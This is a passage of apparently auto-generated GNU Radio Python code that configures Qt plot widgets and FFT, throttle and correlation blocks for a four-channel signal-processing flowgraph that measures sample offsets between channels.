self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN0", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0.enable_stem_plot(False)
self.qtgui_time_sink_x_0_1_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_win, 0, 0, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1 = qtgui.time_sink_f(
8192, #size
samp_rate, #samp_rate
"", #name
4 #number of inputs
)
self.qtgui_time_sink_x_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh, trig_delay, trig_channel, "")
self.qtgui_time_sink_x_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1.enable_stem_plot(False)
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_1.addWidget(self._qtgui_time_sink_x_0_1_win, 0, 0, 1, 4)
for r in range(0, 1):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_1 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_1.enable_stem_plot(False)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_1_win, 4, 3, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_time_sink_x_0_0_0 = qtgui.time_sink_f(
            1024, #size
            samp_rate, #samp_rate
            "", #name
            1 #number of inputs
        )
        self.qtgui_time_sink_x_0_0_0.set_update_time(0.010)
        self.qtgui_time_sink_x_0_0_0.set_y_axis(-1, 1)
        self.qtgui_time_sink_x_0_0_0.set_y_label('Amplitude', "")
        self.qtgui_time_sink_x_0_0_0.enable_tags(-1, True)
        self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
        self.qtgui_time_sink_x_0_0_0.enable_autoscale(True)
        self.qtgui_time_sink_x_0_0_0.enable_grid(False)
        self.qtgui_time_sink_x_0_0_0.enable_axis_labels(True)
        self.qtgui_time_sink_x_0_0_0.enable_control_panel(False)
        self.qtgui_time_sink_x_0_0_0.enable_stem_plot(False)
        if not True:
            self.qtgui_time_sink_x_0_0_0.disable_legend()
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "blue"]
        styles = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        markers = [-1, -1, -1, -1, -1,
                   -1, -1, -1, -1, -1]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_time_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_time_sink_x_0_0_0.set_line_label(i, labels[i])
            self.qtgui_time_sink_x_0_0_0.set_line_width(i, widths[i])
            self.qtgui_time_sink_x_0_0_0.set_line_color(i, colors[i])
            self.qtgui_time_sink_x_0_0_0.set_line_style(i, styles[i])
            self.qtgui_time_sink_x_0_0_0.set_line_marker(i, markers[i])
            self.qtgui_time_sink_x_0_0_0.set_line_alpha(i, alphas[i])
        self._qtgui_time_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_0_win, 4, 2, 2, 1)
        for r in range(4, 6):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(2, 3):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_time_sink_x_0_0 = qtgui.time_sink_f(
            1024, #size
            samp_rate, #samp_rate
            "", #name
            1 #number of inputs
        )
        self.qtgui_time_sink_x_0_0.set_update_time(0.010)
        self.qtgui_time_sink_x_0_0.set_y_axis(-1, 1)
        self.qtgui_time_sink_x_0_0.set_y_label('Amplitude', "")
        self.qtgui_time_sink_x_0_0.enable_tags(-1, True)
        self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
        self.qtgui_time_sink_x_0_0.enable_autoscale(True)
        self.qtgui_time_sink_x_0_0.enable_grid(False)
        self.qtgui_time_sink_x_0_0.enable_axis_labels(True)
        self.qtgui_time_sink_x_0_0.enable_control_panel(False)
        self.qtgui_time_sink_x_0_0.enable_stem_plot(False)
        if not True:
            self.qtgui_time_sink_x_0_0.disable_legend()
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "blue"]
        styles = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        markers = [-1, -1, -1, -1, -1,
                   -1, -1, -1, -1, -1]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_time_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_time_sink_x_0_0.set_line_label(i, labels[i])
            self.qtgui_time_sink_x_0_0.set_line_width(i, widths[i])
            self.qtgui_time_sink_x_0_0.set_line_color(i, colors[i])
            self.qtgui_time_sink_x_0_0.set_line_style(i, styles[i])
            self.qtgui_time_sink_x_0_0.set_line_marker(i, markers[i])
            self.qtgui_time_sink_x_0_0.set_line_alpha(i, alphas[i])
        self._qtgui_time_sink_x_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_win, 4, 1, 2, 1)
        for r in range(4, 6):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(1, 2):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_time_sink_x_0 = qtgui.time_sink_f(
            1024, #size
            samp_rate, #samp_rate
            "", #name
            1 #number of inputs
        )
        self.qtgui_time_sink_x_0.set_update_time(0.010)
        self.qtgui_time_sink_x_0.set_y_axis(-1, 1)
        self.qtgui_time_sink_x_0.set_y_label('Amplitude', "")
        self.qtgui_time_sink_x_0.enable_tags(-1, True)
        self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
        self.qtgui_time_sink_x_0.enable_autoscale(True)
        self.qtgui_time_sink_x_0.enable_grid(False)
        self.qtgui_time_sink_x_0.enable_axis_labels(True)
        self.qtgui_time_sink_x_0.enable_control_panel(False)
        self.qtgui_time_sink_x_0.enable_stem_plot(False)
        if not True:
            self.qtgui_time_sink_x_0.disable_legend()
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "blue"]
        styles = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        markers = [-1, -1, -1, -1, -1,
                   -1, -1, -1, -1, -1]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_time_sink_x_0.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_time_sink_x_0.set_line_label(i, labels[i])
            self.qtgui_time_sink_x_0.set_line_width(i, widths[i])
            self.qtgui_time_sink_x_0.set_line_color(i, colors[i])
            self.qtgui_time_sink_x_0.set_line_style(i, styles[i])
            self.qtgui_time_sink_x_0.set_line_marker(i, markers[i])
            self.qtgui_time_sink_x_0.set_line_alpha(i, alphas[i])
        self._qtgui_time_sink_x_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_win, 4, 0, 2, 1)
        for r in range(4, 6):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(0, 1):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_number_sink_0 = qtgui.number_sink(
            gr.sizeof_float,
            0,
            qtgui.NUM_GRAPH_NONE,
            3
        )
        self.qtgui_number_sink_0.set_update_time(0.10)
        self.qtgui_number_sink_0.set_title("samp_offset")
        labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
                  '', '', '', '', '']
        units = ['samples', 'samples', 'samples', '', '',
                 '', '', '', '', '']
        colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
                  ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
        factor = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        for i in xrange(3):
            self.qtgui_number_sink_0.set_min(i, -1)
            self.qtgui_number_sink_0.set_max(i, 1)
            self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])
            if len(labels[i]) == 0:
                self.qtgui_number_sink_0.set_label(i, "Data {0}".format(i))
            else:
                self.qtgui_number_sink_0.set_label(i, labels[i])
            self.qtgui_number_sink_0.set_unit(i, units[i])
            self.qtgui_number_sink_0.set_factor(i, factor[i])
        self.qtgui_number_sink_0.enable_autoscale(False)
        self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_2.addWidget(self._qtgui_number_sink_0_win, 9, 0, 1, 3)
        for r in range(9, 10):
            self.main_tab_grid_layout_2.setRowStretch(r, 1)
        for c in range(0, 3):
            self.main_tab_grid_layout_2.setColumnStretch(c, 1)
        self.qtgui_freq_sink_x_0_1_0 = qtgui.freq_sink_c(
            1024, #size
            firdes.WIN_BLACKMAN_hARRIS, #wintype
            0, #fc
            samp_rate, #bw
            "", #name
            1 #number of inputs
        )
        self.qtgui_freq_sink_x_0_1_0.set_update_time(0.010)
        self.qtgui_freq_sink_x_0_1_0.set_y_axis(-140, 10)
        self.qtgui_freq_sink_x_0_1_0.set_y_label('Relative Gain', 'dB')
        self.qtgui_freq_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
        self.qtgui_freq_sink_x_0_1_0.enable_autoscale(False)
        self.qtgui_freq_sink_x_0_1_0.enable_grid(False)
        self.qtgui_freq_sink_x_0_1_0.set_fft_average(1.0)
        self.qtgui_freq_sink_x_0_1_0.enable_axis_labels(True)
        self.qtgui_freq_sink_x_0_1_0.enable_control_panel(False)
        if not False:
            self.qtgui_freq_sink_x_0_1_0.disable_legend()
        if "complex" == "float" or "complex" == "msg_float":
            self.qtgui_freq_sink_x_0_1_0.set_plot_pos_half(not True)
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "dark blue"]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_freq_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_freq_sink_x_0_1_0.set_line_label(i, labels[i])
            self.qtgui_freq_sink_x_0_1_0.set_line_width(i, widths[i])
            self.qtgui_freq_sink_x_0_1_0.set_line_color(i, colors[i])
            self.qtgui_freq_sink_x_0_1_0.set_line_alpha(i, alphas[i])
        self._qtgui_freq_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_0_win, 0, 3, 2, 1)
        for r in range(0, 2):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(3, 4):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_freq_sink_x_0_1 = qtgui.freq_sink_c(
            1024, #size
            firdes.WIN_BLACKMAN_hARRIS, #wintype
            0, #fc
            samp_rate, #bw
            "", #name
            1 #number of inputs
        )
        self.qtgui_freq_sink_x_0_1.set_update_time(0.010)
        self.qtgui_freq_sink_x_0_1.set_y_axis(-140, 10)
        self.qtgui_freq_sink_x_0_1.set_y_label('Relative Gain', 'dB')
        self.qtgui_freq_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
        self.qtgui_freq_sink_x_0_1.enable_autoscale(False)
        self.qtgui_freq_sink_x_0_1.enable_grid(False)
        self.qtgui_freq_sink_x_0_1.set_fft_average(1.0)
        self.qtgui_freq_sink_x_0_1.enable_axis_labels(True)
        self.qtgui_freq_sink_x_0_1.enable_control_panel(False)
        if not False:
            self.qtgui_freq_sink_x_0_1.disable_legend()
        if "complex" == "float" or "complex" == "msg_float":
            self.qtgui_freq_sink_x_0_1.set_plot_pos_half(not True)
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "dark blue"]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_freq_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_freq_sink_x_0_1.set_line_label(i, labels[i])
            self.qtgui_freq_sink_x_0_1.set_line_width(i, widths[i])
            self.qtgui_freq_sink_x_0_1.set_line_color(i, colors[i])
            self.qtgui_freq_sink_x_0_1.set_line_alpha(i, alphas[i])
        self._qtgui_freq_sink_x_0_1_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_win, 0, 2, 2, 1)
        for r in range(0, 2):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(2, 3):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_freq_sink_x_0_0 = qtgui.freq_sink_c(
            1024, #size
            firdes.WIN_BLACKMAN_hARRIS, #wintype
            0, #fc
            samp_rate, #bw
            "", #name
            1 #number of inputs
        )
        self.qtgui_freq_sink_x_0_0.set_update_time(0.010)
        self.qtgui_freq_sink_x_0_0.set_y_axis(-140, 10)
        self.qtgui_freq_sink_x_0_0.set_y_label('Relative Gain', 'dB')
        self.qtgui_freq_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
        self.qtgui_freq_sink_x_0_0.enable_autoscale(False)
        self.qtgui_freq_sink_x_0_0.enable_grid(False)
        self.qtgui_freq_sink_x_0_0.set_fft_average(1.0)
        self.qtgui_freq_sink_x_0_0.enable_axis_labels(True)
        self.qtgui_freq_sink_x_0_0.enable_control_panel(False)
        if not False:
            self.qtgui_freq_sink_x_0_0.disable_legend()
        if "complex" == "float" or "complex" == "msg_float":
            self.qtgui_freq_sink_x_0_0.set_plot_pos_half(not True)
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "dark blue"]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_freq_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_freq_sink_x_0_0.set_line_label(i, labels[i])
            self.qtgui_freq_sink_x_0_0.set_line_width(i, widths[i])
            self.qtgui_freq_sink_x_0_0.set_line_color(i, colors[i])
            self.qtgui_freq_sink_x_0_0.set_line_alpha(i, alphas[i])
        self._qtgui_freq_sink_x_0_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_0_win, 0, 1, 2, 1)
        for r in range(0, 2):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(1, 2):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.qtgui_freq_sink_x_0 = qtgui.freq_sink_c(
            1024, #size
            firdes.WIN_BLACKMAN_hARRIS, #wintype
            0, #fc
            samp_rate, #bw
            "", #name
            1 #number of inputs
        )
        self.qtgui_freq_sink_x_0.set_update_time(0.010)
        self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)
        self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')
        self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
        self.qtgui_freq_sink_x_0.enable_autoscale(False)
        self.qtgui_freq_sink_x_0.enable_grid(False)
        self.qtgui_freq_sink_x_0.set_fft_average(1.0)
        self.qtgui_freq_sink_x_0.enable_axis_labels(True)
        self.qtgui_freq_sink_x_0.enable_control_panel(False)
        if not False:
            self.qtgui_freq_sink_x_0.disable_legend()
        if "complex" == "float" or "complex" == "msg_float":
            self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)
        labels = ['', '', '', '', '',
                  '', '', '', '', '']
        widths = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        colors = ["blue", "red", "green", "black", "cyan",
                  "magenta", "yellow", "dark red", "dark green", "dark blue"]
        alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
                  1.0, 1.0, 1.0, 1.0, 1.0]
        for i in xrange(1):
            if len(labels[i]) == 0:
                self.qtgui_freq_sink_x_0.set_line_label(i, "Data {0}".format(i))
            else:
                self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])
            self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])
            self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])
            self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])
        self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)
        self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_win, 0, 0, 2, 1)
        for r in range(0, 2):
            self.main_tab_grid_layout_0.setRowStretch(r, 1)
        for c in range(0, 1):
            self.main_tab_grid_layout_0.setColumnStretch(c, 1)
        self.pyqt_meta_text_output_0_0_0_0_0 = pyqt.meta_text_output()
        self._pyqt_meta_text_output_0_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0_0
        self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_0_0_win, 1, 4, 1, 1)
        for r in range(1, 2):
            self.main_tab_grid_layout_3.setRowStretch(r, 1)
        for c in range(4, 5):
            self.main_tab_grid_layout_3.setColumnStretch(c, 1)
        self.pyqt_meta_text_output_0_0_0_0 = pyqt.meta_text_output()
        self._pyqt_meta_text_output_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0
        self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_0_win, 1, 3, 1, 1)
        for r in range(1, 2):
            self.main_tab_grid_layout_3.setRowStretch(r, 1)
        for c in range(3, 4):
            self.main_tab_grid_layout_3.setColumnStretch(c, 1)
        self.pyqt_meta_text_output_0_0_0 = pyqt.meta_text_output()
        self._pyqt_meta_text_output_0_0_0_win = self.pyqt_meta_text_output_0_0_0
        self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_win, 1, 2, 1, 1)
        for r in range(1, 2):
            self.main_tab_grid_layout_3.setRowStretch(r, 1)
        for c in range(2, 3):
            self.main_tab_grid_layout_3.setColumnStretch(c, 1)
        self.pyqt_meta_text_output_0_0 = pyqt.meta_text_output()
        self._pyqt_meta_text_output_0_0_win = self.pyqt_meta_text_output_0_0
        self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_win, 1, 1, 1, 1)
        for r in range(1, 2):
            self.main_tab_grid_layout_3.setRowStretch(r, 1)
        for c in range(1, 2):
            self.main_tab_grid_layout_3.setColumnStretch(c, 1)
        self.pyqt_meta_text_output_0 = pyqt.meta_text_output()
        self._pyqt_meta_text_output_0_win = self.pyqt_meta_text_output_0
        self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_win, 1, 0, 1, 1)
        for r in range(1, 2):
            self.main_tab_grid_layout_3.setRowStretch(r, 1)
        for c in range(0, 1):
            self.main_tab_grid_layout_3.setColumnStretch(c, 1)
        self.fft_vxx_1_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_0_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_0_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_0_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_0_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.fft_vxx_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
        self.blocks_throttle_3 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle, True)
        self.blocks_throttle_2 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle, True)
        self.blocks_throttle_1 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle, True)
        self.blocks_throttle_0 = blocks.throttle(gr.sizeof_gr_complex*1, samp_rate / throttle, True)
        self.blocks_stream_to_vector_0_1_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
        self.blocks_stream_to_vector_0_1 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
        self.blocks_stream_to_vector_0_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
        self.blocks_stream_to_vector_0_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
        self.blocks_stream_to_vector_0_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
        self.blocks_stream_to_vector_0 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, nfft)
        self.blocks_skiphead_3 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
        self.blocks_skiphead_2 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
        self.blocks_skiphead_1 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
        self.blocks_skiphead_0 = blocks.skiphead(gr.sizeof_gr_complex*1, 0)
        self.blocks_short_to_float_0_0_0 = blocks.short_to_float(1, 1)
        self.blocks_short_to_float_0_0 = blocks.short_to_float(1, 1)
        self.blocks_short_to_float_0 = blocks.short_to_float(1, 1)
        self.blocks_null_sink_0_0_0 = blocks.null_sink(gr.sizeof_short*1)
        self.blocks_null_sink_0_0 = blocks.null_sink(gr.sizeof_short*1)
        self.blocks_null_sink_0 = blocks.null_sink(gr.sizeof_short*1)
        self.blocks_multiply_const_vxx_0_0_0 = blocks.multiply_const_vff((-1, ))
        self.blocks_multiply_const_vxx_0_0 = blocks.multiply_const_vff((-1, ))
        self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vff((-1, ))
        self.blocks_multiply_conjugate_cc_0_0_0 = blocks.multiply_conjugate_cc(nfft)
